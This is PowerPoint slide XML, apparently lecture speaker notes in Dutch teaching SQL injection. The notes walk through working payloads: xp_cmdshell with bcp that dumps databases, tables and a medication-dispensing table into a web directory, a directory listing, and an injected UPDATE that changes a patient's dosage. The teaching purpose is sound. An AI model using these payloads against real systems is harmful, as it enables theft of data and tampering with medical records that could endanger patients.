              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sp_databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  "c:\xampp\htdocs\db.txt" -c -T' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1"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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72520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sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sp_databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  "c:\xampp\htdocs\db.txt" -c -T' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dit commando vraagt alle databases op en kopieert ze in de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htdocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> directory. </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1186004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sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Je</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hebt nu een overzicht van alle databases in de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> van de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webomgeving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  Je ziet nu bv de database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="881268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sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xp_cmdshell</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bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=''U''" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> "c:\xampp\htdocs\tabel.txt" -c -T'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1"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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201406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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39203607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0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla';</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exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xp_cmdshell</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bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>..medicijnuitgiften" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> "c:\xampp\htdocs\mu.txt" -c -T'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  --</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26050023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sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0"/>
              <a:t> update medicijnuitgiften set dosering='25xdaags' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>patientnr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0"/>
              <a:t>='p302'  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wat zou je kunnen doen als het cijfersysteem van de HAN gevoelig was voor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLinjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{438542CC-6F26-A34B-8E15-4341DD4E0F8B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53104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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12029686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baseline="0" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Het begint met het achterhalen van allerlei informatie.</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="959677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 exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xp_cmdshell</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dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> c:\xampp\htdocs &gt; c:\xampp\htdocs\sites.txt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> --</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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7854123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 exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>xp_cmdshell</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dir</a:t>
